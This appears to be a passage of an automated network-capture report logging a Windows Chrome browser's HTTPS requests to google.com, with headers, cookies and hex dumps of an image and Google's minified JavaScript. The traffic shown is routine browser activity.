                                                                                                                                                                                                                                                                                          sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                                                                          sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                                                                                                                                                                                                                                                          sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                                                                          sec-ch-ua-model: ""
                                                                                                                                                                                                                                                                                          sec-ch-prefers-color-scheme: light
                                                                                                                                                                                                                                                                                          sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                          Referer: https://www.google.com/
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; NID=517=0pWICYgHMs0q-7BzPo6KFxjDxz-SJgCVgj7jFPfXVbH6EjrjxWQ3Rl4lRdRUpk2LNOL2fdjvF93g43vXkJfqEPVF-u3r96lMxeDIRyymdIz_6oVDBsgJDwWab4ew6-xR-owJ_8OPa0nCoUm8CYc_2r0T-OcCst6msaOsdOwe2x5KU1dMUWSBSxX6OPpRIVWNLRI
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:16 UTC671INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                          Content-Type: image/webp
                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="static-on-bigtable"
                                                                                                                                                                                                                                                                                          Report-To: {"group":"static-on-bigtable","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/static-on-bigtable"}]}
                                                                                                                                                                                                                                                                                          Content-Length: 660
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:41:16 GMT
                                                                                                                                                                                                                                                                                          Expires: Fri, 27 Sep 2024 14:41:16 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: private, max-age=31536000
                                                                                                                                                                                                                                                                                          Last-Modified: Wed, 22 Apr 2020 22:00:00 GMT
                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                          Server: sffe
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:16 UTC660INData Raw: 52 49 46 46 8c 02 00 00 57 45 42 50 56 50 38 4c 80 02 00 00 2f 27 c0 1e 10 d5 48 76 b6 3d 6e 95 fb bf 0a bb 07 b8 51 ea d8 9f 99 61 e5 e8 28 52 76 0c 6f ab da 55 98 1c c6 fe ea 8a 99 6c 18 b6 6d 1b a6 ff 1f dc da f4 06 30 6c db 36 6c ae ed 66 da 0c b1 ed 09 a4 90 41 3f 42 08 43 98 41 19 94 c1 32 68 06 9d 41 67 30 84 10 0e e1 47 38 07 6e 23 29 52 ba 6a f1 78 a0 e6 be 50 9e 46 e5 ce 49 3b cc 4f 78 a1 e7 c7 cf f5 1c 37 2d f7 c8 cf 62 58 9e 2f eb c0 5d c5 88 96 af 33 cb b8 1c 54 80 ab 93 e1 a2 35 b7 ba 01 78 ee ac da f6 47 2e 43 09 aa 19 e0 b7 25 e2 75 03 8e 19 f9 14 75 2f 97 5f b4 3d f0 b2 94 98 bc 10 3c 21 71 06 5c 86 f8 07 39 02 f7 de b2 c2 15 5c f7 a6 1a 07 70 3a 14 bc 50 f8 34 1f 61 53 00 4e 29 9c 3e b0 3e 18 ae 22 06 db 83 39 99 e0 56 68 20 a7 aa d0 80
                                                                                                                                                                                                                                                                                          Data Ascii: RIFFWEBPVP8L/'Hv=nQa(RvoUlm0l6lfA?BCA2hAg0G8n#)RjxPFI;Ox7-bX/]3T5xG.C%uu/_=<!q\9\p:P4aSN)>>"9Vh


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          28192.168.2.749765142.250.181.2284435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:16 UTC3885OUTGET /xjs/_/js/k=xjs.hd.en.dIEp8Iy3TZo.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAIAgQAEAAACAAgAAAAAAAAAAAAAAAAAAAgQBAEQCAAACAOAAACAQAAABAAISAAABEoBHmQAAEQBMAAAAAAAQAAAIFAEAQAAAAAYAAAABAAAAAAAKAAAAAAAAAAAAAAAAAEAAgQAAAAAAAAAAAAAgAAAAAPQAAAAAAAAAgAAAAAECAANkAAIAAAAAAAD6ACB4AAwpLAAAAAAAAAAAAAAAEIAEwVxIQEEAAgAAAAAAAAAAAAAAACAlTVzY/d=1/ed=1/dg=3/br=1/rs=ACT90oHQtgb1Vp7_2FMfyCLADlsBNbpGNA/ee=ALeJib:B8gLwd;AfeaP:TkrAjf;BMxAGc:E5bFse;BgS6mb:fidj5d;BjwMce:cXX2Wb;CxXAWb:YyRLvc;DULqB:RKfG5c;Dkk6ge:JZmW9e;DpcR3d:zL72xf;EABSZ:MXZt9d;ESrPQc:mNTJvc;EVNhjf:pw70Gc;EmZ2Bf:zr1jrb;EnlcNd:WeHg4;F9mqte:UoRcbe;Fmv9Nc:O1Tzwc;G0KhTb:LIaoZ;G6wU6e:hezEbd;GleZL:J1A7Od;HMDDWe:G8QUdb;HoYVKb:PkDN7e;HqeXPd:cmbnH;IBADCc:RYquRb;IoGlCf:b5lhvb;IsdWVc:qzxzOb;JXS8fb:Qj0suc;JbMT3:M25sS;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;KOxcK:OZqGte;KQzWid:ZMKkN;KcokUb:KiuZBf;KpRAue:Tia57b;LBgRLc:SdcwHb,XVMNvd;LEikZe:byfTOb,lsjVmc;LXA8b:q7OdKd;LsNahb:ucGLNb;Me32dd:MEeYgc;NPKaK:SdcwHb;NSEoX:lazG7b;Np8Qkd:Dpx6qc;Nyt6ic:jn2sGd;OgagBe:cNTe0;OohIYe:mpEAQb;Pjplu [TRUNCATED]
                                                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                                                                          sec-ch-ua-full-version: "117.0.5938.134"
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                                                                          sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                                                                                                                                                                                                                                                          sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                                                                          sec-ch-ua-model: ""
                                                                                                                                                                                                                                                                                          sec-ch-prefers-color-scheme: light
                                                                                                                                                                                                                                                                                          sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                          Referer: https://www.google.com/
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; NID=517=0pWICYgHMs0q-7BzPo6KFxjDxz-SJgCVgj7jFPfXVbH6EjrjxWQ3Rl4lRdRUpk2LNOL2fdjvF93g43vXkJfqEPVF-u3r96lMxeDIRyymdIz_6oVDBsgJDwWab4ew6-xR-owJ_8OPa0nCoUm8CYc_2r0T-OcCst6msaOsdOwe2x5KU1dMUWSBSxX6OPpRIVWNLRI
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:16 UTC831INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                          Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/gws-team
                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin; report-to="gws-team"
                                                                                                                                                                                                                                                                                          Report-To: {"group":"gws-team","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws-team"}]}
                                                                                                                                                                                                                                                                                          Content-Length: 1037371
                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                          Server: sffe
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 06:23:14 GMT
                                                                                                                                                                                                                                                                                          Expires: Sat, 27 Sep 2025 06:23:14 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: public, immutable, max-age=31536000
                                                                                                                                                                                                                                                                                          Last-Modified: Fri, 27 Sep 2024 04:59:45 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                                          Age: 29882
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:16 UTC559INData Raw: 74 68 69 73 2e 5f 68 64 3d 74 68 69 73 2e 5f 68 64 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 74 72 79 7b 0a 2f 2a 0a 0a 20 43 6f 70 79 72 69 67 68 74 20 54 68 65 20 43 6c 6f 73 75 72 65 20 4c 69 62 72 61 72 79 20 41 75 74 68 6f 72 73 2e 0a 20 53 50 44 58 2d 4c 69 63 65 6e 73 65 2d 49 64 65 6e 74 69 66 69 65 72 3a 20 41 70 61 63 68 65 2d 32 2e 30 0a 2a 2f 0a 2f 2a 0a 0a 20 43 6f 70 79 72 69 67 68 74 20 47 6f 6f 67 6c 65 20 4c 4c 43 0a 20 53 50 44 58 2d 4c 69 63 65 6e 73 65 2d 49 64 65 6e 74 69 66 69 65 72 3a 20 41 70 61 63 68 65 2d 32 2e 30 0a 2a 2f 0a 2f 2a 0a 0a 20 43 6f 70 79 72 69 67 68 74 20 32 30 32 34 20 47 6f 6f 67 6c 65 2c 20 49 6e 63 0a 20 53 50 44 58 2d 4c 69 63 65 6e 73 65 2d 49 64
                                                                                                                                                                                                                                                                                          Data Ascii: this._hd=this._hd||{};(function(_){var window=this;try{/* Copyright The Closure Library Authors. SPDX-License-Identifier: Apache-2.0*//* Copyright Google LLC SPDX-License-Identifier: Apache-2.0*//* Copyright 2024 Google, Inc SPDX-License-Id
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:16 UTC1390INData Raw: 61 2c 45 63 61 2c 46 63 61 2c 47 63 61 2c 41 63 61 2c 48 63 61 2c 42 63 61 2c 49 63 61 2c 7a 63 61 2c 4a 63 61 2c 79 63 61 2c 4b 63 61 2c 4d 63 61 2c 54 63 61 2c 56 63 61 2c 57 63 61 2c 24 63 61 2c 61 64 61 2c 65 64 61 2c 68 64 61 2c 62 64 61 2c 67 64 61 2c 66 64 61 2c 64 64 61 2c 63 64 61 2c 69 64 61 2c 6a 64 61 2c 6e 64 61 2c 70 64 61 2c 6f 64 61 2c 73 64 61 2c 74 64 61 2c 75 64 61 2c 77 64 61 2c 79 64 61 2c 78 64 61 2c 41 64 61 2c 42 64 61 2c 43 64 61 2c 45 64 61 2c 46 64 61 2c 47 64 61 2c 48 64 61 2c 49 64 61 2c 4c 64 61 2c 4d 64 61 2c 4e 64 61 2c 52 64 61 2c 51 64 61 2c 55 64 61 2c 56 64 61 2c 24 64 61 2c 61 65 61 2c 62 65 61 2c 64 65 61 2c 63 65 61 2c 66 65 61 2c 65 65 61 2c 69 65 61 2c 68 65 61 2c 6b 65 61 2c 6d 65 61 2c 70 65 61 2c 71 65 61 2c 74
                                                                                                                                                                                                                                                                                          Data Ascii: a,Eca,Fca,Gca,Aca,Hca,Bca,Ica,zca,Jca,yca,Kca,Mca,Tca,Vca,Wca,$ca,ada,eda,hda,bda,gda,fda,dda,cda,ida,jda,nda,pda,oda,sda,tda,uda,wda,yda,xda,Ada,Bda,Cda,Eda,Fda,Gda,Hda,Ida,Lda,Mda,Nda,Rda,Qda,Uda,Vda,$da,aea,bea,dea,cea,fea,eea,iea,hea,kea,mea,pea,qea,t
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:16 UTC1390INData Raw: 53 74 61 63 6b 54 72 61 63 65 29 45 72 72 6f 72 2e 63 61 70 74 75 72 65 53 74 61 63 6b 54 72 61 63 65 28 74 68 69 73 2c 5f 2e 61 61 29 3b 65 6c 73 65 7b 76 61 72 20 63 3d 45 72 72 6f 72 28 29 2e 73 74 61 63 6b 3b 63 26 26 28 74 68 69 73 2e 73 74 61 63 6b 3d 63 29 7d 61 26 26 28 74 68 69 73 2e 6d 65 73 73 61 67 65 3d 53 74 72 69 6e 67 28 61 29 29 3b 62 21 3d 3d 76 6f 69 64 20 30 26 26 28 74 68 69 73 2e 63 61 75 73 65 3d 62 29 7d 3b 5f 2e 61 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 61 3d 61 2e 73 70 6c 69 74 28 22 25 73 22 29 3b 66 6f 72 28 76 61 72 20 63 3d 22 22 2c 64 3d 61 2e 6c 65 6e 67 74 68 2d 31 2c 65 3d 30 3b 65 3c 64 3b 65 2b 2b 29 63 2b 3d 61 5b 65 5d 2b 28 65 3c 62 2e 6c 65 6e 67 74 68 3f 62 5b 65 5d 3a 22 25 73 22 29 3b 5f 2e 61 61 2e
                                                                                                                                                                                                                                                                                          Data Ascii: StackTrace)Error.captureStackTrace(this,_.aa);else{var c=Error().stack;c&&(this.stack=c)}a&&(this.message=String(a));b!==void 0&&(this.cause=b)};_.aaa=function(a,b){a=a.split("%s");for(var c="",d=a.length-1,e=0;e<d;e++)c+=a[e]+(e<b.length?b[e]:"%s");_.aa.
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:16 UTC1390INData Raw: 61 3d 76 6f 69 64 20 30 29 3b 74 68 72 6f 77 20 66 3b 7d 7d 3b 0a 5f 2e 6c 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 62 3d 62 3d 3d 3d 76 6f 69 64 20 30 3f 21 31 3a 62 3b 69 66 28 69 61 61 29 7b 69 66 28 62 26 26 28 6a 61 61 3f 21 61 2e 69 73 57 65 6c 6c 46 6f 72 6d 65 64 28 29 3a 2f 28 3f 3a 5b 5e 5c 75 44 38 30 30 2d 5c 75 44 42 46 46 5d 7c 5e 29 5b 5c 75 44 43 30 30 2d 5c 75 44 46 46 46 5d 7c 5b 5c 75 44 38 30 30 2d 5c 75 44 42 46 46 5d 28 3f 21 5b 5c 75 44 43 30 30 2d 5c 75 44 46 46 46 5d 29 2f 2e 74 65 73 74 28 61 29 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 4f 22 29 3b 61 3d 28 6b 61 61 7c 7c 28 6b 61 61 3d 6e 65 77 20 54 65 78 74 45 6e 63 6f 64 65 72 29 29 2e 65 6e 63 6f 64 65 28 61 29 7d 65 6c 73 65 7b 66 6f 72 28 76 61 72 20 63 3d 30
                                                                                                                                                                                                                                                                                          Data Ascii: a=void 0);throw f;}};_.laa=function(a,b){b=b===void 0?!1:b;if(iaa){if(b&&(jaa?!a.isWellFormed():/(?:[^\uD800-\uDBFF]|^)[\uDC00-\uDFFF]|[\uD800-\uDBFF](?![\uDC00-\uDFFF])/.test(a)))throw Error("O");a=(kaa||(kaa=new TextEncoder)).encode(a)}else{for(var c=0
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:16 UTC1390INData Raw: 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 2e 71 61 61 28 29 3f 21 31 3a 5f 2e 69 61 28 22 45 64 67 65 22 29 7d 3b 5f 2e 75 61 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 2e 71 61 61 28 29 3f 6e 61 61 28 22 4d 69 63 72 6f 73 6f 66 74 20 45 64 67 65 22 29 3a 5f 2e 69 61 28 22 45 64 67 2f 22 29 7d 3b 0a 5f 2e 76 61 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 2e 69 61 28 22 46 69 72 65 66 6f 78 22 29 7c 7c 5f 2e 69 61 28 22 46 78 69 4f 53 22 29 7d 3b 5f 2e 6c 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 2e 69 61 28 22 53 61 66 61 72 69 22 29 26 26 21 28 5f 2e 6a 61 28 29 7c 7c 28 5f 2e 71 61 61 28 29 3f 30 3a 5f 2e 69 61 28 22 43 6f 61 73 74 22 29 29 7c 7c 5f 2e 72 61 61 28 29 7c 7c 5f 2e 74 61
                                                                                                                                                                                                                                                                                          Data Ascii: nction(){return _.qaa()?!1:_.ia("Edge")};_.uaa=function(){return _.qaa()?naa("Microsoft Edge"):_.ia("Edg/")};_.vaa=function(){return _.ia("Firefox")||_.ia("FxiOS")};_.la=function(){return _.ia("Safari")&&!(_.ja()||(_.qaa()?0:_.ia("Coast"))||_.raa()||_.ta
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:16 UTC1390INData Raw: 6c 65 73 73 43 68 72 6f 6d 65 22 5d 29 7d 72 65 74 75 72 6e 20 61 3d 3d 3d 22 46 69 72 65 66 6f 78 22 26 26 5f 2e 76 61 61 28 29 7c 7c 61 3d 3d 3d 22 53 61 66 61 72 69 22 26 26 5f 2e 6c 61 28 29 7c 7c 61 3d 3d 3d 22 41 6e 64 72 6f 69 64 20 42 72 6f 77 73 65 72 22 26 26 5f 2e 78 61 61 28 29 7c 7c 61 3d 3d 3d 22 53 69 6c 6b 22 26 26 5f 2e 77 61 61 28 29 3f 28 61 3d 62 5b 32 5d 29 26 26 0a 61 5b 31 5d 7c 7c 22 22 3a 22 22 7d 3b 5f 2e 42 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 5f 2e 71 61 61 28 29 26 26 61 21 3d 3d 22 53 69 6c 6b 22 29 7b 76 61 72 20 62 3d 5f 2e 65 61 2e 62 72 61 6e 64 73 2e 66 69 6e 64 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 63 2e 62 72 61 6e 64 3d 3d 3d 61 7d 29 3b 69 66 28 21 62 7c 7c 21 62 2e 76 65 72 73
                                                                                                                                                                                                                                                                                          Data Ascii: lessChrome"])}return a==="Firefox"&&_.vaa()||a==="Safari"&&_.la()||a==="Android Browser"&&_.xaa()||a==="Silk"&&_.waa()?(a=b[2])&&a[1]||"":""};_.Baa=function(a){if(_.qaa()&&a!=="Silk"){var b=_.ea.brands.find(function(c){return c.brand===a});if(!b||!b.vers
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:16 UTC1390INData Raw: 5d 29 3b 72 65 74 75 72 6e 20 62 7c 7c 22 22 7d 3b 0a 5f 2e 4b 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 5f 2e 70 61 28 5f 2e 4a 61 61 28 29 2c 61 29 3e 3d 30 7d 3b 5f 2e 71 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 5b 61 2e 6c 65 6e 67 74 68 2d 31 5d 7d 3b 5f 2e 72 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 66 6f 72 28 76 61 72 20 64 3d 74 79 70 65 6f 66 20 61 3d 3d 3d 22 73 74 72 69 6e 67 22 3f 61 2e 73 70 6c 69 74 28 22 22 29 3a 61 2c 65 3d 61 2e 6c 65 6e 67 74 68 2d 31 3b 65 3e 3d 30 3b 2d 2d 65 29 65 20 69 6e 20 64 26 26 62 2e 63 61 6c 6c 28 63 2c 64 5b 65 5d 2c 65 2c 61 29 7d 3b 5f 2e 4c 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 62 3d 5f 2e 73 61 28 61 2c 62 2c 63 29 3b 72 65
                                                                                                                                                                                                                                                                                          Data Ascii: ]);return b||""};_.Kaa=function(a){return _.pa(_.Jaa(),a)>=0};_.qa=function(a){return a[a.length-1]};_.ra=function(a,b,c){for(var d=typeof a==="string"?a.split(""):a,e=a.length-1;e>=0;--e)e in d&&b.call(c,d[e],e,a)};_.Laa=function(a,b,c){b=_.sa(a,b,c);re
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:16 UTC1390INData Raw: 6d 65 6e 74 73 5b 63 5d 3b 69 66 28 5f 2e 41 61 28 64 29 29 7b 76 61 72 20 65 3d 61 2e 6c 65 6e 67 74 68 7c 7c 30 2c 66 3d 64 2e 6c 65 6e 67 74 68 7c 7c 30 3b 61 2e 6c 65 6e 67 74 68 3d 65 2b 66 3b 66 6f 72 28 76 61 72 20 67 3d 30 3b 67 3c 66 3b 67 2b 2b 29 61 5b 65 2b 67 5d 3d 64 5b 67 5d 7d 65 6c 73 65 20 61 2e 70 75 73 68 28 64 29 7d 7d 3b 5f 2e 55 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 29 7b 72 65 74 75 72 6e 20 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 70 6c 69 63 65 2e 61 70 70 6c 79 28 61 2c 54 61 61 28 61 72 67 75 6d 65 6e 74 73 2c 31 29 29 7d 3b 54 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 72 65 74 75 72 6e 20 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3c 3d 32 3f 41 72 72 61 79 2e 70 72 6f 74 6f 74
                                                                                                                                                                                                                                                                                          Data Ascii: ments[c];if(_.Aa(d)){var e=a.length||0,f=d.length||0;a.length=e+f;for(var g=0;g<f;g++)a[e+g]=d[g]}else a.push(d)}};_.Uaa=function(a,b,c,d){return Array.prototype.splice.apply(a,Taa(arguments,1))};Taa=function(a,b,c){return arguments.length<=2?Array.protot
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:16 UTC1390INData Raw: 72 61 79 28 64 29 29 66 6f 72 28 76 61 72 20 65 3d 30 3b 65 3c 64 2e 6c 65 6e 67 74 68 3b 65 2b 3d 38 31 39 32 29 7b 76 61 72 20 66 3d 54 61 61 28 64 2c 65 2c 65 2b 38 31 39 32 29 3b 66 3d 5f 2e 63 62 61 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 66 29 3b 66 6f 72 28 76 61 72 20 67 3d 30 3b 67 3c 66 2e 6c 65 6e 67 74 68 3b 67 2b 2b 29 62 2e 70 75 73 68 28 66 5b 67 5d 29 7d 65 6c 73 65 20 62 2e 70 75 73 68 28 64 29 7d 72 65 74 75 72 6e 20 62 7d 3b 5f 2e 64 62 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 2e 66 61 28 5f 2e 64 61 28 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 22 77 65 62 6b 69 74 22 29 26 26 21 5f 2e 69 61 28 22 45 64 67 65 22 29 7d 3b 5f 2e 65 62 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 2e 69 61 28 22 47
                                                                                                                                                                                                                                                                                          Data Ascii: ray(d))for(var e=0;e<d.length;e+=8192){var f=Taa(d,e,e+8192);f=_.cba.apply(null,f);for(var g=0;g<f.length;g++)b.push(f[g])}else b.push(d)}return b};_.dba=function(){return _.fa(_.da().toLowerCase(),"webkit")&&!_.ia("Edge")};_.eba=function(){return _.ia("G
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:16 UTC1390INData Raw: 3a 21 31 7d 3b 74 68 72 6f 77 20 45 72 72 6f 72 28 22 54 22 29 3b 7d 3b 73 62 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 42 69 67 49 6e 74 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 7d 3b 0a 5f 2e 76 62 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 74 62 61 3b 69 66 28 21 75 62 61 28 61 29 29 7b 76 61 72 20 63 2c 64 3b 62 3d 28 64 3d 28 63 3d 74 79 70 65 6f 66 20 62 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 62 28 29 3a 62 29 3d 3d 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 63 2e 63 6f 6e 63 61 74 28 22 5c 6e 22 29 29 21 3d 6e 75 6c 6c 3f 64 3a 22 22 3b 74 68 72 6f 77 20 45 72 72 6f 72 28 22 55 60 22 2b 62 2b 22 60 22 2b 53 74 72 69 6e 67 28 61 29 29 3b 7d 7d 3b 5f 2e 77 62 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b
                                                                                                                                                                                                                                                                                          Data Ascii: :!1};throw Error("T");};sba=function(){return typeof BigInt==="function"};_.vba=function(a){var b=tba;if(!uba(a)){var c,d;b=(d=(c=typeof b==="function"?b():b)==null?void 0:c.concat("\n"))!=null?d:"";throw Error("U`"+b+"`"+String(a));}};_.wba=function(a){


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          29192.168.2.749768142.250.181.2284435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:16 UTC1452OUTPOST /gen_204?s=webhp&t=cap&atyp=csi&ei=CsT2Zo-iIaySxc8Pn72EmA8&rt=wsrt.1050,cbs.108,cbt.961,hst.49&opi=89978449&ts=199973 HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                                                                          sec-ch-ua-full-version: "117.0.5938.134"
                                                                                                                                                                                                                                                                                          Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                                                                          sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                                                                                                                                                                                                                                                          sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                                                                          sec-ch-ua-model: ""
                                                                                                                                                                                                                                                                                          sec-ch-prefers-color-scheme: light
                                                                                                                                                                                                                                                                                          sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          Origin: https://www.google.com
